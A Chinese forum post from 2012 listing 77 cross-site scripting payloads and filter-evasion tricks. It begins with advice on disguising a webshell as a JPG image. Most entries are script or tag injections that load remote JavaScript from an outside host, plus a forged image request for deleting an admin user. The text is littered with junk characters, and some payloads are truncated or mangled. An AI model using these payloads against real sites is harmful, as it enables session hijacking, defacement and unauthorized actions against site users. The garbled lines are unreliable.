跨站图片shell
4 B6 N; s: l: ~& I2 IXSS跨站代码 <script>alert("")</script>) ?; d8 V+ x; s+ t) {
4 y5 ]0 F; v# _3 y! }4 K将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马$ u- W. G1 |' l! |% [4 b/ L; _
* Q3 D9 ?0 |. p) D$ ~
, a0 F- U2 a) \, \. ]; L: ?* m, Q8 r4 e
1)普通的XSS JavaScript注入/ H8 K0 T$ \( M5 D
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 a$ }1 c) p0 a! B6 K+ c. V1 v
# y. B" c; X" b5 T(2)IMG标签XSS使用JavaScript命令
& B; O6 e7 h3 k<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 o" m0 i P9 y8 y0 ?; {4 `0 g% ~
# Y+ @8 J" s) q& B(3)IMG标签无分号无引号
p. l5 @2 V4 x3 v& | n<IMG SRC=javascript:alert(‘XSS’)>
- Q% G) B9 u) B7 K* y; L# c) M; |" Z) U# n
(4)IMG标签大小写不敏感
7 X3 h$ F* c4 Q8 I: x$ ^<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
( {* }0 ]) {- i6 V8 l/ o; p& }2 g. |
(5)HTML编码(必须有分号)+ e& B$ ? b* J( ^$ V" N6 ?6 X
<IMG SRC=javascript:alert(“XSS”)>
$ l8 S3 H& U5 w- W& q2 I/ s4 {" E
: v7 }5 n" j; w! T(6)修正缺陷IMG标签, N- {) T* M% _! N% e) f; i1 f2 y
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
1 `9 _: s7 o& \; N
2 r b& L; F' r( m(7)formCharCode标签(计算器)
! l D% L5 P; [% U: Y# B<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
I% i" y! y# R2 X9 v3 S) C0 ]. q- `
& }6 _( j- @! U: O3 ]& X& B! \(8)UTF-8的Unicode编码(计算器)
3 b+ B9 t* S% d3 Q" a) [6 K. ?7 B9 \<IMG SRC=jav..省略..S')>, f1 r! l: d" o( @- y% I5 {6 R/ y
, W0 }. U. h# Y
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
% }4 i& o6 ?8 [4 Q& W<IMG SRC=jav..省略..S')>
/ F8 @" n: d7 l6 T* T9 \* P& p5 R( S' a/ y
(10)十六进制编码也是没有分号(计算器)
7 p2 J2 z4 E& L% O' g<IMG SRC=java..省略..XSS')>2 X" A' V9 e/ f+ c: ?
; W3 B8 T5 T' Q4 E W
(11)嵌入式标签,将Javascript分开/ Y5 e! d. a! h( V
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 c) S/ N4 C0 Q
3 c' c& H; c6 t9 T* [- R- _6 c(12)嵌入式编码标签,将Javascript分开5 X3 Q- n. r. G) g0 M0 [0 u
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ d! _2 r0 h. W$ Q% G6 [3 O- p8 z1 H7 H& f: O
(13)嵌入式换行符
/ U; s; G. h+ D5 }0 C0 C<IMG SRC=”jav ascript:alert(‘XSS’);”>' O# S) |+ B5 }! @' o
/ M, L; t4 I0 O, W+ a7 e6 P
(14)嵌入式回车
' h. |) V, W4 C3 z& K7 e, C<IMG SRC=”jav ascript:alert(‘XSS’);”>7 Y" T5 W5 G: V( d( g5 ^4 W- ?
+ v' f0 @( q* o( S& }% F3 h
(15)嵌入式多行注入JavaScript,这是XSS极端的例子& k* O/ u3 i8 K/ P" {" r3 {* h8 P
<IMG SRC=”javascript:alert(‘XSS‘)”>
; r4 f" z- A& v: `! d7 A, p* h+ V8 @6 z9 b( z4 }- G5 r3 W" n
(16)解决限制字符(要求同页面)
. A* {6 X5 G7 A# g: z& z<script>z=’document.’</script>$ W6 W( z# F" J* m. a5 J
<script>z=z+’write(“‘</script>! X# V; N7 ^$ y$ @2 b
<script>z=z+’<script’</script>; O/ Q- }" ^1 r0 l! W% E
<script>z=z+’ src=ht’</script>
/ W l9 Y6 T# o. D; A, o- e# x<script>z=z+’tp://ww’</script>
4 A w0 y0 ^& H, c<script>z=z+’w.shell’</script>
7 K- T( C8 [+ R3 \( B<script>z=z+’.net/1.’</script>
5 A7 }2 P4 j& W1 q6 y<script>z=z+’js></sc’</script>, {( ^3 ]2 B" S& J# ?! q1 |
<script>z=z+’ript>”)’</script>+ ~, d8 Z0 m2 @& j
<script>eval_r(z)</script>% t, x" k% S* y# J3 q" I
$ ]& Q+ o' x* H& G# @3 K
(17)空字符
% @* ~3 r$ z1 x1 P8 P }! Rperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 _+ `. S6 n& c, [$ l; M8 X
% z, S$ F: g* L$ k. W5 g7 F4 ?8 L(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用# ?2 M8 ]0 {, C: W, v! Z
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 Q4 g' h* l! S9 O
; t2 ^7 T5 v" c: Z3 t6 x
(19)Spaces和meta前的IMG标签
6 L3 C$ A( G$ m; i<IMG SRC=” javascript:alert(‘XSS’);”>. D n; ~" H8 O0 P8 m
) l; n: j0 I8 x9 q8 m. |7 a
(20)Non-alpha-non-digit XSS
9 y' Y) i) Z' a/ w) K<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>2 L% H v9 S% T' U/ U5 S
, t" G. _+ i g
(21)Non-alpha-non-digit XSS to 2
) ]5 H6 S' [ t9 ^+ _<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
8 v+ M4 ~4 {* k; q. s
% L; u1 T, [$ d: t" ~4 C(22)Non-alpha-non-digit XSS to 3
# m h) |. O8 O# Q. G* T* `$ p3 t<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>5 i( x- X, H4 _ L
- z- Q' @2 C: h* T
(23)双开括号
; h2 B% _1 c9 F# |7 \<<SCRIPT>alert(“XSS”);//<</SCRIPT>
4 G: B/ @* F4 l. a- L1 [3 i2 f& b" x4 u+ ?7 a7 h
(24)无结束脚本标记(仅火狐等浏览器)
* O6 y; `4 j% F1 |4 m3 v<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
3 I$ h: Q6 _! x9 `8 g
2 z* y( ` x X) t- K; |/ @* H(25)无结束脚本标记2: n- G+ L6 Y! N u7 g. K7 ~$ ~
<SCRIPT SRC=//3w.org/XSS/xss.js>$ D* S0 K; G! K; d4 O" u
0 G9 w) [: i% \# |( v! }4 z7 V
(26)半开的HTML/JavaScript XSS
7 d+ _- e8 I$ Z8 g$ t2 o& C<IMG SRC=”javascript:alert(‘XSS’)”
& x1 t' x8 T% I4 W: k- T2 b
( o* p0 l( z) F(27)双开角括号
! c( D' j: ?- I% N% V4 \9 i7 b- j& O: z<iframe src=http://3w.org/XSS.html <% m. i) I5 Y2 X* ]$ b$ d5 y. u& y9 M
$ P) A6 r# Y* v: J(28)无单引号 双引号 分号( ]' t/ @3 f% h! P0 q2 s5 }
<SCRIPT>a=/XSS/
) r0 e) q4 d* T" X8 m3 M5 Kalert(a.source)</SCRIPT>: ~6 ]: H; [( s
. {0 q- G5 z! A, ^0 R9 b(29)换码过滤的JavaScript- _ D$ K% o6 }+ X8 \% c0 y
\”;alert(‘XSS’);//
* F- @* b1 t9 ^+ |. s2 q
4 t& ?* h1 H+ X( @$ P(30)结束Title标签: x- w" `. h- V8 b5 [. h; n$ [
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
+ ]5 B' l: A. q6 U( ]$ |- N) M6 g9 Q/ e! [5 ]* G. u: j' u; L' L7 Y
(31)Input Image
5 b }8 {6 H _: Y: k<INPUT SRC=”javascript:alert(‘XSS’);”>8 d, a, {% \. A8 ]5 K8 f% v
- w: b1 ^. q9 y9 S4 B4 e(32)BODY Image
" S+ q( Y- N: h1 L9 p<BODY BACKGROUND=”javascript:alert(‘XSS’)”>8 p. K; F: i3 x% T! W
* t/ U5 V3 l- R# x
(33)BODY标签
- G0 G+ S! t1 p% x' D+ r. o: z# r8 Q<BODY(‘XSS’)>
6 i- u5 ~8 \9 X4 q
$ ?" f, U) @2 W/ p4 s(34)IMG Dynsrc
* X" J/ E: u+ y; [6 M<IMG DYNSRC=”javascript:alert(‘XSS’)”>5 @* ~0 S) E+ {6 {( @( J% P
' b4 h! m4 J- k5 a `9 L(35)IMG Lowsrc
/ y7 H! Z1 Y) s" n3 p<IMG LOWSRC=”javascript:alert(‘XSS’)”>) s- @6 p$ w1 D& D4 t
4 w @) V" U2 s' v1 G
(36)BGSOUND
7 C$ y' e: A' S<BGSOUND SRC=”javascript:alert(‘XSS’);”>
8 l; C& r3 i% B* ~
5 [' L8 x+ L/ S) [% r7 m(37)STYLE sheet
1 ]' l0 V7 z. Z2 O; n5 ]( h6 V<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>8 W/ N) [1 ~9 B* O- _: }. n! v+ n
2 z4 C9 V) r" E6 P
(38)远程样式表5 t8 ~) ~* \/ q6 @% E
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
1 @, w% A; s" v6 `( l$ P
, I* T8 i9 g$ L(39)List-style-image(列表式)9 _& r! \: j: [( S5 h3 ?# z
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
5 c3 @/ @7 F @& C5 w: j- E5 l9 v- G
(40)IMG VBscript# b; _; P2 {* n- V
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS! J# }/ i1 O( L: t
" k. v6 I5 e& \' e
(41)META链接url
! W K& }, k7 g3 {$ Z+ Y<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
" D' F( J* Z4 j q7 J
! A3 g, x4 r( j- Z6 V(42)Iframe
) p2 I, d; u8 A! @" P& G! y<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
5 M4 i7 g2 L7 c0 \1 r(43)Frame
/ b3 n2 \4 X; t& N0 v5 L& O<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
( T ?- q9 T" z
) a" I0 U9 F+ [8 J6 O, }- h+ v% U(44)Table
: x2 b; q C. e<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>( Y% [0 x' w# Z
8 p3 \) q# ?& a+ E7 Z/ Q7 J, O3 m
(45)TD
9 H) ~! u& |. J- V- y<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
: z2 m. C. m. ?/ i- H2 z! P& P" R* X0 ^& ]
(46)DIV background-image3 ]9 ]3 r4 J2 f7 L$ K( T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>2 R% n9 G( v4 V1 A6 C6 f9 v
0 ~! Y( ~% R8 v B- O(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)% G( N* @! f8 n2 S' A
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
* e$ I& n* Q" v! L& @ K- Y" L
# P, p5 c! {& z3 g6 G& @2 }' q(48)DIV expression b+ ~9 b8 Q$ Y) t) Z) ^7 g- B! D
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
5 U0 f& l! D8 c' G" r+ H$ a0 N6 I. x) m# Q
(49)STYLE属性分拆表达
; U$ \* U& e7 q0 a<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ K! }+ [* }8 [# i
" o2 c! l' [ k _0 |" B
(50)匿名STYLE(组成:开角号和一个字母开头)- f* M* B8 d. N: D6 r, p6 Z
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>1 f$ M# V/ Q. n; M1 c* N' Y
9 ^5 ~) Z8 ~& I+ i8 d" |& Y
(51)STYLE background-image* I5 B3 t. p! d; k D
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>+ S, s/ t7 a5 Y0 ]6 ~4 J
+ |& U0 y( n% a" S9 s
(52)IMG STYLE方式: I: f# h; ]/ {. d/ {0 ^) U
exppression(alert(“XSS”))’>
+ G1 }& z0 ^. o( J$ o- Y7 _" Q4 b: A
4 V; O' i: \0 J* O) U& d(53)STYLE background
- D" \" ~/ C6 a9 _- I<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>/ v) o: ^* @, g: @" D2 o a! \% E
R, {: Y# z" l(54)BASE0 h/ ^8 Q2 u1 ~. Q' b/ \$ z
<BASE HREF=”javascript:alert(‘XSS’);//”>5 h' B5 f; A3 N- Y
8 n& E& S3 q$ s8 F V6 Z(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS0 M4 c) w# }* ^" R8 m. P
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
% y6 w0 p' h5 z+ E1 }( E& N' ~$ v# R, i% l' i9 R6 m2 u) i6 P
(56)在flash中使用ActionScrpt可以混进你XSS的代码
% [2 `! |* Y3 d/ \# B: z4 Q/ @9 Sa=”get”;; \4 G' ^( L* R) {2 c7 i& r
b=”URL(\”";1 z, v$ v9 ]0 n
c=”javascript:”;
2 p0 | w+ y/ M4 t, P4 P$ f* ?" Ed=”alert(‘XSS’);\”)”;/ ] q) b, q5 ] }9 k; o" o3 a
eval_r(a+b+c+d);
! T4 k+ k; |6 ]. I' l; m- O- q3 [$ |
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
" ?& D& p. v. M<HTML xmlns:xss>
! {5 A' K. J+ M9 M<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>+ P( o/ ]3 T7 |7 p0 O
<xss:xss>XSS</xss:xss>
: _% q4 R* h* u) j' w [: e9 L% V8 w</HTML># v. V& G# B7 Q
" m$ A4 ~; T3 b e(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
7 I" Q+ s' V$ l* K+ j& x6 U" [<SCRIPT SRC=””></SCRIPT>* k4 ^; c% r5 h8 w+ ~" T4 v
0 |7 D' J w3 a M+ F B(59)IMG嵌入式命令,可执行任意命令! P9 E0 W, \ T# z! I0 G( D
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' y; g: R( m& m3 [0 B7 v
d6 }! m3 p0 _7 J(60)IMG嵌入式命令(a.jpg在同服务器)+ P8 J- T' n/ M2 M$ }
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser/ S, W3 K: ^! x7 _0 X- E
$ \# `4 V+ ?7 } T6 U! |" W( [(61)绕符号过滤
* M( }/ ^' G2 B% _9 G<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>% j5 c* q; g3 O1 b7 o: O
' ~. p/ `' p$ W" w, Y) W8 _3 C8 _
(62)
% }9 H6 r% j) M$ l6 J9 p& h7 y# l# p<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. r; i) ^6 z( x, E- T% \5 [+ W {
- _! X" h$ m1 r7 U(63)
1 d) L3 \; s& a$ U" y* P<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
; c+ y2 _8 v* J. Z3 O6 v) |
' m& [+ r$ K5 e k2 x9 P% i(64)
4 E) R7 }% L$ a. [<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
* ]" F5 A2 ?5 W( A) g/ X7 i u* _9 P# Y, H" R* ^' ^4 r1 m6 a s4 c
(65)
8 d6 J8 f/ @& O! {: n<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>, L; K2 ~8 F3 g7 A
6 D9 `6 s, t1 ^5 e$ H
(66)$ S0 O6 H+ \2 o
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT># `- M3 M7 A& ^% S. Q
7 X _2 k- Z" m1 Q
(67)0 v$ c6 C+ N$ g! i+ z% C) K! m
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>5 E$ O K+ C, V5 s. Z
/ P* @% J0 x; [. T5 q6 k0 o0 {# n- w/ h(68)URL绕行, U0 c7 a& u' N, d' d- B) k
<A HREF=”http://127.0.0.1/”>XSS</A>) i& j8 `% D e3 N
# _! L' Z- c8 B9 S- I1 L O( p(69)URL编码
1 q- z/ d' g: M+ w9 \3 c: }<A HREF=”http://3w.org”>XSS</A>
) ^" `. ]* Z8 E
. o$ D. Y8 s& R3 n(70)IP十进制
' s- d7 d5 H0 ] {1 I<A HREF=”http://3232235521″>XSS</A>4 h$ [# w; q3 `
! I* f. L, f2 H0 P$ C' |(71)IP十六进制
1 F# D) ?: D$ k; H* G7 V- x% b7 C1 R<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>/ ]3 a$ L7 R3 m+ n3 A. }
3 _; p$ O e$ ~$ q4 }" S(72)IP八进制
N) ]" }7 V4 @0 P<A HREF=”http://0300.0250.0000.0001″>XSS</A>- _, @8 `3 v" c" N( I# m3 j0 b c
7 `! Q* l; m5 n4 R(73)混合编码
- \) P3 \! F' r4 d% ]<A HREF=”h
; @- S' o! {8 g+ `/ mtt p://6 6.000146.0×7.147/”">XSS</A>
) g. z, t4 _( D, c8 A. h
* e9 @1 J: `. T5 B* l(74)节省[http:]
" h7 \/ n; ~- w) _<A HREF=”//www.google.com/”>XSS</A>
# v& Z j% o* D% e0 o' ]/ J0 a' e1 x+ J7 x- ^8 ]# M' [
(75)节省[www]
6 K/ x. i! b' m4 V$ J& ]<A HREF=”http://google.com/”>XSS</A>, q5 _1 g: {5 |' o+ X3 q" D
$ n5 y' P& U) ]! t2 J& ^(76)绝对点绝对DNS
- w' K7 _4 U8 ~3 X9 O* ~4 ?* u! z<A HREF=”http://www.google.com./”>XSS</A>
) n! S [: _3 Z) k$ M
& y" V5 m, {$ S" |* P7 m(77)javascript链接( C1 M" ~5 r, R
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
3 a! X- S+ H( J2 R7 u |
发表于 2012-9-13 17:04:56
收藏
支持
反对